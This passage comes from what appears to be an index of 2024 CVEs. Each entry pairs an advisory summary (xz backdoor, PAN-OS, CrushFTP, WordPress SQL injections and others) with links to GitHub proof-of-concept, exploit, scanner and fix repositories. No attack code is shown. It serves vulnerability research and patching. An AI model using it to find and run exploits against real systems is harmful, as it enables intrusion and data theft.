This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version: v3.2.02) due to improper implementation of password policies. An attacker with physical access could exploit this by creating passwords that do not adhere to the defined security standards/policy on the vulnerable system. Successful exploitation of this vulnerability could allow the attacker to expose the router to potential security threats.

- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Policy-Bypass-CVE-2024-2257)

### CVE-2024-2389 (2024-04-02)

In Flowmon versions prior to 11.1.14 and 12.3.5, an operating system command injection vulnerability has been identified. An unauthenticated user can gain entry to the system via the Flowmon management interface, allowing for the execution of arbitrary system commands.

- [adhikara13/CVE-2024-2389](https://github.com/adhikara13/CVE-2024-2389)

### CVE-2024-2432 (2024-03-13)

A privilege escalation (PE) vulnerability in the Palo Alto Networks GlobalProtect app on Windows devices enables a local user to execute programs with elevated privileges. However, execution requires that the local user is able to successfully exploit a race condition.

- [Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP](https://github.com/Hagrid29/CVE-2024-2432-PaloAlto-GlobalProtect-EoP)

### CVE-2024-2667 (2024-05-02)

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

- [Puvipavan/CVE-2024-2667](https://github.com/Puvipavan/CVE-2024-2667)

### CVE-2024-2876 (2024-05-02)

The Email Subscribers by Icegram Express – Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'run' function of the 'IG_ES_Subscribers_Query' class in all versions up to, and including, 5.7.14 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [c0d3zilla/CVE-2024-2876](https://github.com/c0d3zilla/CVE-2024-2876)
- [Quantum-Hacker/CVE-2024-2876](https://github.com/Quantum-Hacker/CVE-2024-2876)
- [0xAgun/CVE-2024-2876](https://github.com/0xAgun/CVE-2024-2876)
- [skyrowalker/CVE-2024-2876](https://github.com/skyrowalker/CVE-2024-2876)

### CVE-2024-2879 (2024-04-03)

The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7.9.11 and 7.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [herculeszxc/CVE-2024-2879](https://github.com/herculeszxc/CVE-2024-2879)

### CVE-2024-2887 (2024-03-26)

Type Confusion in WebAssembly in Google Chrome prior to 123.0.6312.86 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)

- [PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC](https://github.com/PumpkinBridge/Chrome-CVE-2024-2887-RCE-POC)
- [rycbar77/CVE-2024-2887](https://github.com/rycbar77/CVE-2024-2887)

### CVE-2024-2961 (2024-04-17)

The iconv() function in the GNU C Library versions 2.39 and older may overflow the output buffer passed to it by up to 4 bytes when converting strings to the ISO-2022-CN-EXT character set, which may be used to crash an application or overwrite a neighbouring variable.

- [mattaperkins/FIX-CVE-2024-2961](https://github.com/mattaperkins/FIX-CVE-2024-2961)
- [rvizx/CVE-2024-2961](https://github.com/rvizx/CVE-2024-2961)
- [ambionics/cnext-exploits](https://github.com/ambionics/cnext-exploits)
- [absolutedesignltd/iconvfix](https://github.com/absolutedesignltd/iconvfix)
- [exfil0/test_iconv](https://github.com/exfil0/test_iconv)
- [tnishiox/cve-2024-2961](https://github.com/tnishiox/cve-2024-2961)
- [kjdfklha/CVE-2024-2961_poc](https://github.com/kjdfklha/CVE-2024-2961_poc)

### CVE-2024-2997 (2024-03-27)

A problematic vulnerability was found in Bdtask Multi-Store Inventory Management System up to 20240320. It affects unknown code. Manipulation of the argument Category Name/Model Name/Brand Name/Unit Name with unknown data can exploit a cross site scripting vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [lfillaz/CVE-2024-2997](https://github.com/lfillaz/CVE-2024-2997)

### CVE-2024-3094 (2024-03-29)

Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.

- [byinarie/CVE-2024-3094-info](https://github.com/byinarie/CVE-2024-3094-info)
- [FabioBaroni/CVE-2024-3094-checker](https://github.com/FabioBaroni/CVE-2024-3094-checker)
- [lypd0/CVE-2024-3094-Vulnerabity-Checker](https://github.com/lypd0/CVE-2024-3094-Vulnerabity-Checker)
- [OpensourceICTSolutions/xz_utils-CVE-2024-3094](https://github.com/OpensourceICTSolutions/xz_utils-CVE-2024-3094)
- [bioless/xz_cve-2024-3094_detection](https://github.com/bioless/xz_cve-2024-3094_detection)
- [Hacker-Hermanos/CVE-2024-3094_xz_check](https://github.com/Hacker-Hermanos/CVE-2024-3094_xz_check)
- [Fractal-Tess/CVE-2024-3094](https://github.com/Fractal-Tess/CVE-2024-3094)
- [wgetnz/CVE-2024-3094-check](https://github.com/wgetnz/CVE-2024-3094-check)
- [emirkmo/xz-backdoor-github](https://github.com/emirkmo/xz-backdoor-github)
- [ashwani95/CVE-2024-3094](https://github.com/ashwani95/CVE-2024-3094)
- [harekrishnarai/xz-utils-vuln-checker](https://github.com/harekrishnarai/xz-utils-vuln-checker)
- [teyhouse/CVE-2024-3094](https://github.com/teyhouse/CVE-2024-3094)
- [alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer](https://github.com/alokemajumder/CVE-2024-3094-Vulnerability-Checker-Fixer)
- [Horizon-Software-Development/CVE-2024-3094](https://github.com/Horizon-Software-Development/CVE-2024-3094)
- [hazemkya/CVE-2024-3094-checker](https://github.com/hazemkya/CVE-2024-3094-checker)
- [lockness-Ko/xz-vulnerable-honeypot](https://github.com/lockness-Ko/xz-vulnerable-honeypot)
- [brinhosa/CVE-2024-3094-One-Liner](https://github.com/brinhosa/CVE-2024-3094-One-Liner)
- [isuruwa/CVE-2024-3094](https://github.com/isuruwa/CVE-2024-3094)
- [Yuma-Tsushima07/CVE-2024-3094](https://github.com/Yuma-Tsushima07/CVE-2024-3094)
- [jfrog/cve-2024-3094-tools](https://github.com/jfrog/cve-2024-3094-tools)
- [Simplifi-ED/CVE-2024-3094-patcher](https://github.com/Simplifi-ED/CVE-2024-3094-patcher)
- [gayatriracha/CVE-2024-3094-Nmap-NSE-script](https://github.com/gayatriracha/CVE-2024-3094-Nmap-NSE-script)
- [Mustafa1986/CVE-2024-3094](https://github.com/Mustafa1986/CVE-2024-3094)
- [MrBUGLF/XZ-Utils_CVE-2024-3094](https://github.com/MrBUGLF/XZ-Utils_CVE-2024-3094)
- [galacticquest/cve-2024-3094-detect](https://github.com/galacticquest/cve-2024-3094-detect)
- [zgimszhd61/cve-2024-3094-detect-tool](https://github.com/zgimszhd61/cve-2024-3094-detect-tool)
- [mightysai1997/CVE-2024-3094-info](https://github.com/mightysai1997/CVE-2024-3094-info)
- [mightysai1997/CVE-2024-3094](https://github.com/mightysai1997/CVE-2024-3094)
- [mesutgungor/xz-backdoor-vulnerability](https://github.com/mesutgungor/xz-backdoor-vulnerability)
- [reuteras/CVE-2024-3094](https://github.com/reuteras/CVE-2024-3094)
- [amlweems/xzbot](https://github.com/amlweems/xzbot)
- [gustavorobertux/CVE-2024-3094](https://github.com/gustavorobertux/CVE-2024-3094)
- [ackemed/detectar_cve-2024-3094](https://github.com/ackemed/detectar_cve-2024-3094)
- [0xlane/xz-cve-2024-3094](https://github.com/0xlane/xz-cve-2024-3094)
- [dah4k/CVE-2024-3094](https://github.com/dah4k/CVE-2024-3094)
- [hackingetico21/revisaxzutils](https://github.com/hackingetico21/revisaxzutils)
- [devjanger/CVE-2024-3094-XZ-Backdoor-Detector](https://github.com/devjanger/CVE-2024-3094-XZ-Backdoor-Detector)
- [ScrimForever/CVE-2024-3094](https://github.com/ScrimForever/CVE-2024-3094)
- [pentestfunctions/CVE-2024-3094](https://github.com/pentestfunctions/CVE-2024-3094)
- [r0binak/xzk8s](https://github.com/r0binak/xzk8s)
- [przemoc/xz-backdoor-links](https://github.com/przemoc/xz-backdoor-links)
- [CyberGuard-Foundation/CVE-2024-3094](https://github.com/CyberGuard-Foundation/CVE-2024-3094)
- [Security-Phoenix-demo/CVE-2024-3094-fix-exploits](https://github.com/Security-Phoenix-demo/CVE-2024-3094-fix-exploits)
- [MagpieRYL/CVE-2024-3094-backdoor-env-container](https://github.com/MagpieRYL/CVE-2024-3094-backdoor-env-container)
- [Bella-Bc/xz-backdoor-CVE-2024-3094-Check](https://github.com/Bella-Bc/xz-backdoor-CVE-2024-3094-Check)
- [TheTorjanCaptain/CVE-2024-3094-Checker](https://github.com/TheTorjanCaptain/CVE-2024-3094-Checker)
- [iheb2b/CVE-2024-3094-Checker](https://github.com/iheb2b/CVE-2024-3094-Checker)
- [felipecosta09/cve-2024-3094](https://github.com/felipecosta09/cve-2024-3094)
- [weltregie/liblzma-scan](https://github.com/weltregie/liblzma-scan)
- [crfearnworks/ansible-CVE-2024-3094](https://github.com/crfearnworks/ansible-CVE-2024-3094)
- [robertdebock/ansible-playbook-cve-2024-3094](https://github.com/robertdebock/ansible-playbook-cve-2024-3094)
- [badsectorlabs/ludus_xz_backdoor](https://github.com/badsectorlabs/ludus_xz_backdoor)
- [Juul/xz-backdoor-scan](https://github.com/Juul/xz-backdoor-scan)
- [fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-](https://github.com/fevar54/Detectar-Backdoor-en-liblzma-de-XZ-utils-CVE-2024-3094-)
- [neuralinhibitor/xzwhy](https://github.com/neuralinhibitor/xzwhy)
- [AndreaCicca/Sicurezza-Informatica-Presentazione](https://github.com/AndreaCicca/Sicurezza-Informatica-Presentazione)
- [shefirot/CVE-2024-3094](https://github.com/shefirot/CVE-2024-3094)
- [DANO-AMP/CVE-2024-3094](https://github.com/DANO-AMP/CVE-2024-3094)
- [robertdfrench/ifuncd-up](https://github.com/robertdfrench/ifuncd-up)

### CVE-2024-3105 (2024-06-15)

The Woody code snippets – Insert Header Footer Code, AdSense Ads plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 2.5.0 via the 'insert_php' shortcode. This is due to the plugin not restricting the usage of the functionality to high level authorized users. This makes it possible for authenticated attackers, with contributor-level access and above, to execute code on the server.

- [hunThubSpace/CVE-2024-3105-PoC](https://github.com/hunThubSpace/CVE-2024-3105-PoC)

### CVE-2024-3116 (2024-04-04)

pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE) vulnerability through the validate binary path API. This vulnerability allows attackers to execute arbitrary code on the server hosting pgAdmin, posing a severe risk to the database management system's integrity and the security of the underlying data.

- [TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4](https://github.com/TechieNeurons/CVE-2024-3116_RCE_in_pgadmin_8.4)

### CVE-2024-3177 (2024-04-22)

A security issue was discovered in Kubernetes where users may be able to launch containers that bypass the mountable secrets policy enforced by the ServiceAccount admission plugin when using containers, init containers, and ephemeral containers with the envFrom field populated. The policy ensures pods running with a service account may only reference secrets specified in the service account’s secrets field. Kubernetes clusters are only affected if the ServiceAccount admission plugin and the kubernetes.io/enforce-mountable-secrets annotation are used together with containers, init containers, and ephemeral containers with the envFrom field populated.

- [Cgv-Dev/Metasploit-Module-TFM](https://github.com/Cgv-Dev/Metasploit-Module-TFM)

### CVE-2024-3183 (2024-06-12)

A vulnerability was found in FreeIPA in the way a Kerberos TGS-REQ is encrypted using the client's session key. This key is different for each new session, which protects it from brute force attacks. However, the ticket it contains is encrypted using the target principal key directly. For user principals, this key is a hash of a public per-principal randomly-generated salt and the user's password.

If a principal is compromised, it means the attacker would be able to retrieve tickets encrypted to any principal, all of them being encrypted by their own key directly. By taking these tickets and salts offline, the attacker could run brute force attacks to find character strings able to decrypt tickets when combined with a principal salt (i.e. find the principal's password).

- [Cyxow/CVE-2024-3183-POC](https://github.com/Cyxow/CVE-2024-3183-POC)

### CVE-2024-3217 (2024-04-05)

The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'attribute_value' and 'attribute_id' parameters in all versions up to, and including, 1.3.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [BassamAssiri/CVE-2024-3217-POC](https://github.com/BassamAssiri/CVE-2024-3217-POC)

### CVE-2024-3272 (2024-04-04)

A vulnerability was discovered in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403 and rated as very critical. Affected is an unknown process of the file /cgi-bin/nas_sharing.cgi in the component HTTP GET Request Handler. Manipulation of the argument user with the input messagebus with unknown data can exploit a hard-coded credentials vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [nickswink/D-Link-NAS-Devices-Unauthenticated-RCE](https://github.com/nickswink/D-Link-NAS-Devices-Unauthenticated-RCE)
- [aliask/dinkleberry](https://github.com/aliask/dinkleberry)

### CVE-2024-3273 (2024-04-04)

A vulnerability was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403 and rated as critical. Affected is an unknown process of the file /cgi-bin/nas_sharing.cgi in the component HTTP GET Request Handler. Manipulation of the argument system with unknown data can exploit a command injection vulnerability. The attack can be launched over the network. The exploit is publicly available.

- [Chocapikk/CVE-2024-3273](https://github.com/Chocapikk/CVE-2024-3273)
- [adhikara13/CVE-2024-3273](https://github.com/adhikara13/CVE-2024-3273)
- [yarienkiva/honeypot-dlink-CVE-2024-3273](https://github.com/yarienkiva/honeypot-dlink-CVE-2024-3273)
- [K3ysTr0K3R/CVE-2024-3273-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-3273-EXPLOIT)
- [ThatNotEasy/CVE-2024-3273](https://github.com/ThatNotEasy/CVE-2024-3273)
- [LeopoldSkell/CVE-2024-3273](https://github.com/LeopoldSkell/CVE-2024-3273)
- [mrrobot0o/CVE-2024-3273-](https://github.com/mrrobot0o/CVE-2024-3273-)
- [OIivr/Turvan6rkus-CVE-2024-3273](https://github.com/OIivr/Turvan6rkus-CVE-2024-3273)
- [X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE](https://github.com/X-Projetion/CVE-2024-3273-D-Link-Remote-Code-Execution-RCE)

### CVE-2024-3293 (2024-04-23)

The rtMedia for WordPress, BuddyPress and bbPress plugin for WordPress is vulnerable to blind SQL Injection via the rtmedia_gallery shortcode in all versions up to, and including, 4.6.18 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [truonghuuphuc/CVE-2024-3293-Poc](https://github.com/truonghuuphuc/CVE-2024-3293-Poc)

### CVE-2024-3400 (2024-04-12)

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

- [Yuvvi01/CVE-2024-3400](https://github.com/Yuvvi01/CVE-2024-3400)
- [CerTusHack/CVE-2024-3400-PoC](https://github.com/CerTusHack/CVE-2024-3400-PoC)
- [0x0d3ad/CVE-2024-3400](https://github.com/0x0d3ad/CVE-2024-3400)
- [FoxyProxys/CVE-2024-3400](https://github.com/FoxyProxys/CVE-2024-3400)
- [momika233/CVE-2024-3400](https://github.com/momika233/CVE-2024-3400)
- [MrR0b0t19/CVE-2024-3400](https://github.com/MrR0b0t19/CVE-2024-3400)
- [MurrayR0123/CVE-2024-3400-Compromise-Checker](https://github.com/MurrayR0123/CVE-2024-3400-Compromise-Checker)
- [AdaniKamal/CVE-2024-3400](https://github.com/AdaniKamal/CVE-2024-3400)
- [LoanVitor/CVE-2024-3400-](https://github.com/LoanVitor/CVE-2024-3400-)
- [h4x0r-dz/CVE-2024-3400](https://github.com/h4x0r-dz/CVE-2024-3400)
- [W01fh4cker/CVE-2024-3400-RCE-Scan](https://github.com/W01fh4cker/CVE-2024-3400-RCE-Scan)
- [CONDITIONBLACK/CVE-2024-3400-POC](https://github.com/CONDITIONBLACK/CVE-2024-3400-POC)
- [Chocapikk/CVE-2024-3400](https://github.com/Chocapikk/CVE-2024-3400)
- [ihebski/CVE-2024-3400](https://github.com/ihebski/CVE-2024-3400)
- [index2014/CVE-2024-3400-Checker](https://github.com/index2014/CVE-2024-3400-Checker)
- [ZephrFish/CVE-2024-3400-Canary](https://github.com/ZephrFish/CVE-2024-3400-Canary)
- [ak1t4/CVE-2024-3400](https://github.com/ak1t4/CVE-2024-3400)
- [retkoussa/CVE-2024-3400](https://github.com/retkoussa/CVE-2024-3400)
- [schooldropout1337/CVE-2024-3400](https://github.com/schooldropout1337/CVE-2024-3400)
- [hahasagined/CVE-2024-3400](https://github.com/hahasagined/CVE-2024-3400)
- [codeblueprint/CVE-2024-3400](https://github.com/codeblueprint/CVE-2024-3400)
- [swaybs/CVE-2024-3400](https://github.com/swaybs/CVE-2024-3400)
- [sxyrxyy/CVE-2024-3400-Check](https://github.com/sxyrxyy/CVE-2024-3400-Check)
- [Ravaan21/CVE-2024-3400](https://github.com/Ravaan21/CVE-2024-3400)
- [tfrederick74656/cve-2024-3400-poc](https://github.com/tfrederick74656/cve-2024-3400-poc)
- [pwnj0hn/CVE-2024-3400](https://github.com/pwnj0hn/CVE-2024-3400)
- [HackingLZ/panrapidcheck](https://github.com/HackingLZ/panrapidcheck)
- [Kr0ff/cve-2024-3400](https://github.com/Kr0ff/cve-2024-3400)
- [zam89/CVE-2024-3400-pot](https://github.com/zam89/CVE-2024-3400-pot)
- [terminalJunki3/CVE-2024-3400-Checker](https://github.com/terminalJunki3/CVE-2024-3400-Checker)
- [0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection](https://github.com/0xr2r/CVE-2024-3400-Palo-Alto-OS-Command-Injection)
- [marconesler/CVE-2024-3400](https://github.com/marconesler/CVE-2024-3400)
- [andrelia-hacks/CVE-2024-3400](https://github.com/andrelia-hacks/CVE-2024-3400)
- [tk-sawada/IPLineFinder](https://github.com/tk-sawada/IPLineFinder)
- [iwallarm/cve-2024-3400](https://github.com/iwallarm/cve-2024-3400)

### CVE-2024-3435 (2024-05-16)

A path traversal vulnerability exists in the 'save_settings' endpoint of the parisneo/lollms-webui application, affecting versions up to the latest release before 9.5. The vulnerability arises due to insufficient sanitization of the 'config' parameter in the 'apply_settings' function, allowing an attacker to manipulate the application's configuration by sending specially crafted JSON payloads. This could lead to remote code execution (RCE) by bypassing existing patches designed to mitigate such vulnerabilities.

- [ymuraki-csc/cve-2024-3435](https://github.com/ymuraki-csc/cve-2024-3435)

### CVE-2024-3495 (2024-05-22)

The Country State City Dropdown CF7 plugin for WordPress is vulnerable to SQL Injection via the 'cnt' and 'sid' parameters in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [truonghuuphuc/CVE-2024-3495-Poc](https://github.com/truonghuuphuc/CVE-2024-3495-Poc)
- [zomasec/CVE-2024-3495-POC](https://github.com/zomasec/CVE-2024-3495-POC)

### CVE-2024-3552 (2024-06-13)

The Web Directory Free WordPress plugin before 1.7.0 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.

- [truonghuuphuc/CVE-2024-3552-Poc](https://github.com/truonghuuphuc/CVE-2024-3552-Poc)

### CVE-2024-3596 (2024-07-09)

RADIUS Protocol under RFC 2865 is susceptible to forgery attacks by a local attacker who can modify any valid Response (Access-Accept, Access-Reject, or Access-Challenge) to any other response using a chosen-prefix collision attack against MD5 Response Authenticator signature.

- [alperenugurlu/CVE-2024-3596-Detector](https://github.com/alperenugurlu/CVE-2024-3596-Detector)

### CVE-2024-3656

- [h4x0r-dz/CVE-2024-3656](https://github.com/h4x0r-dz/CVE-2024-3656)

### CVE-2024-3806 (2024-05-09)

The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.

- [truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc](https://github.com/truonghuuphuc/CVE-2024-3806-AND-CVE-2024-3807-Poc)

### CVE-2024-3867 (2024-04-16)

The archive-tainacan-collection theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in version 2.7.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.

- [c4cnm/CVE-2024-3867](https://github.com/c4cnm/CVE-2024-3867)

### CVE-2024-3922 (2024-06-13)

The Dokan Pro plugin for WordPress is vulnerable to SQL Injection via the 'code' parameter in all versions up to, and including, 3.10.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [truonghuuphuc/CVE-2024-3922-Poc](https://github.com/truonghuuphuc/CVE-2024-3922-Poc)

### CVE-2024-4040 (2024-04-22)

A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

- [airbus-cert/CVE-2024-4040](https://github.com/airbus-cert/CVE-2024-4040)
- [tucommenceapousser/CVE-2024-4040-Scanner](https://github.com/tucommenceapousser/CVE-2024-4040-Scanner)
- [rbih-boulanouar/CVE-2024-4040](https://github.com/rbih-boulanouar/CVE-2024-4040)
- [Mufti22/CVE-2024-4040](https://github.com/Mufti22/CVE-2024-4040)
- [Stuub/CVE-2024-4040-SSTI-LFI-PoC](https://github.com/Stuub/CVE-2024-4040-SSTI-LFI-PoC)
- [0xN7y/CVE-2024-4040](https://github.com/0xN7y/CVE-2024-4040)
- [Praison001/CVE-2024-4040-CrushFTP-server](https://github.com/Praison001/CVE-2024-4040-CrushFTP-server)
- [Mohammaddvd/CVE-2024-4040](https://github.com/Mohammaddvd/CVE-2024-4040)
- [jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability](https://github.com/jakabakos/CVE-2024-4040-CrushFTP-File-Read-vulnerability)
- [gotr00t0day/CVE-2024-4040](https://github.com/gotr00t0day/CVE-2024-4040)
- [1ncendium/CVE-2024-4040](https://github.com/1ncendium/CVE-2024-4040)
- [olebris/CVE-2024-4040](https://github.com/olebris/CVE-2024-4040)
- [entroychang/CVE-2024-4040](https://github.com/entroychang/CVE-2024-4040)
- [safeer-accuknox/CrushFTP-cve-2024-4040-poc](https://github.com/safeer-accuknox/CrushFTP-cve-2024-4040-poc)
- [geniuszlyy/GenCrushSSTIExploit](https://github.com/geniuszlyy/GenCrushSSTIExploit)
- [rahisec/CVE-2024-4040](https://github.com/rahisec/CVE-2024-4040)

### CVE-2024-4231 (2024-05-10)

This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version: v3.2.02) due to presence of root terminal access on a serial interface without proper access control. An attacker with physical access could exploit this by identifying UART pins and accessing the root shell on the vulnerable system. Successful exploitation of this vulnerability could allow the attacker to access the sensitive information on the targeted system.

- [Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Improper-Access-Control-CVE-2024-4231)

### CVE-2024-4232 (2024-05-10)

This vulnerability exists in Digisol Router (DG-GR1321: Hardware version 3.7L; Firmware version: v3.2.02) due to lack of encryption or hashing when storing passwords within the router's firmware/database. An attacker with physical access could exploit this by extracting the firmware and reverse engineering the binary data to access the plaintext passwords on the vulnerable system. Successful exploitation of this vulnerability could allow the attacker to gain unauthorized access to the targeted system.

- [Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG-GR1321-s-Password-Storage-in-Plaintext-CVE-2024-4232)
- [Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232](https://github.com/Redfox-Secuirty/Digisol-DG--GR1321-s-Password-Storage-in-Plaintext--CVE-2024-4232)

### CVE-2024-4295 (2024-06-05)

The Email Subscribers by Icegram Express plugin for WordPress is vulnerable to SQL Injection via the 'hash' parameter in all versions up to, and including, 5.7.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [truonghuuphuc/CVE-2024-4295-Poc](https://github.com/truonghuuphuc/CVE-2024-4295-Poc)
- [cve-2024/CVE-2024-4295-Poc](https://github.com/cve-2024/CVE-2024-4295-Poc)

### CVE-2024-4320 (2024-06-06)

A remote code execution (RCE) vulnerability exists in the '/install_extension' endpoint of the parisneo/lollms-webui application, specifically within the `@router.post("/install_extension")` route handler. The vulnerability arises due to improper handling of the `name` parameter in the `ExtensionBuilder().build_extension()` method, which allows for local file inclusion (LFI) leading to arbitrary code execution. An attacker can exploit this vulnerability by crafting a malicious `name` parameter that causes the server to load and execute a `__init__.py` file from an arbitrary location, such as the upload directory for discussions. This vulnerability affects the latest version of parisneo/lollms-webui and can lead to remote code execution without requiring user interaction, especially when the application is exposed to an external endpoint or operated in headless mode.

- [bolkv/CVE-2024-4320](https://github.com/bolkv/CVE-2024-4320)

### CVE-2024-4323 (2024-05-20)

A memory corruption vulnerability in Fluent Bit versions 2.0.7 thru 3.0.3. This issue lies in the embedded http server’s parsing of trace requests and may result in denial of service conditions, information disclosure, or remote code execution.

- [skilfoy/CVE-2024-4323-Exploit-POC](https://github.com/skilfoy/CVE-2024-4323-Exploit-POC)
- [d0rb/CVE-2024-4323](https://github.com/d0rb/CVE-2024-4323)
- [yuansec/CVE-2024-4323-dos_poc](https://github.com/yuansec/CVE-2024-4323-dos_poc)

### CVE-2024-4352 (2024-05-16)

The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized access of data, modification of data, loss of data due to a missing capability check on the 'get_calendar_materials' function. The plugin is also vulnerable to SQL Injection via the ‘year’ parameter of that function due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

- [truonghuuphuc/CVE-2024-4352-Poc](https://github.com/truonghuuphuc/CVE-2024-4352-Poc)

### CVE-2024-4358 (2024-05-29)

In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability.

- [sinsinology/CVE-2024-4358](https://github.com/sinsinology/CVE-2024-4358)
- [RevoltSecurities/CVE-2024-4358](https://github.com/RevoltSecurities/CVE-2024-4358)
- [Harydhk7/CVE-2024-4358](https://github.com/Harydhk7/CVE-2024-4358)
- [Sk1dr0wz/CVE-2024-4358_Mass_Exploit](https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit)
- [verylazytech/CVE-2024-4358](https://github.com/verylazytech/CVE-2024-4358)
- [fa-rrel/CVE-2024-4358](https://github.com/fa-rrel/CVE-2024-4358)

### CVE-2024-4367 (2024-05-14)

A type check was missing when handling fonts in PDF.js, which would allow arbitrary JavaScript execution in the PDF.js context. This vulnerability affects Firefox < 126, Firefox ESR < 115.11, and Thunderbird < 115.11.

- [LOURC0D3/CVE-2024-4367-PoC](https://github.com/LOURC0D3/CVE-2024-4367-PoC)
- [s4vvysec/CVE-2024-4367-POC](https://github.com/s4vvysec/CVE-2024-4367-POC)
- [spaceraccoon/detect-cve-2024-4367](https://github.com/spaceraccoon/detect-cve-2024-4367)
- [clarkio/pdfjs-vuln-demo](https://github.com/clarkio/pdfjs-vuln-demo)
- [avalahEE/pdfjs_disable_eval](https://github.com/avalahEE/pdfjs_disable_eval)
- [Zombie-Kaiser/cve-2024-4367-PoC-fixed](https://github.com/Zombie-Kaiser/cve-2024-4367-PoC-fixed)
- [snyk-labs/pdfjs-vuln-demo](https://github.com/snyk-labs/pdfjs-vuln-demo)
- [UnHackerEnCapital/PDFernetRemotelo](https://github.com/UnHackerEnCapital/PDFernetRemotelo)
- [Masamuneee/CVE-2024-4367-Analysis](https://github.com/Masamuneee/CVE-2024-4367-Analysis)

### CVE-2024-4406 (2024-05-02)

Xiaomi Pro 13 GetApps integral-dialog-page Cross-Site Scripting Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Xiaomi Pro 13 smartphones. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the integral-dialog-page.html file. When parsing the integralInfo parameter, the process does not properly sanitize user-supplied data, which can lead to the injection of an arbitrary script. An attacker can leverage this vulnerability to execute code in the context of the current user. Was ZDI-CAN-22332.

